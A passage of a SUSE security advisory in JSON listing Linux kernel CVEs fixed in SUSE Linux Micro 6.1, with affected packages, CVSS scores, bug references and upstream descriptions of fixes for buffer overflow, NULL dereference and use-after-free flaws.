"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n 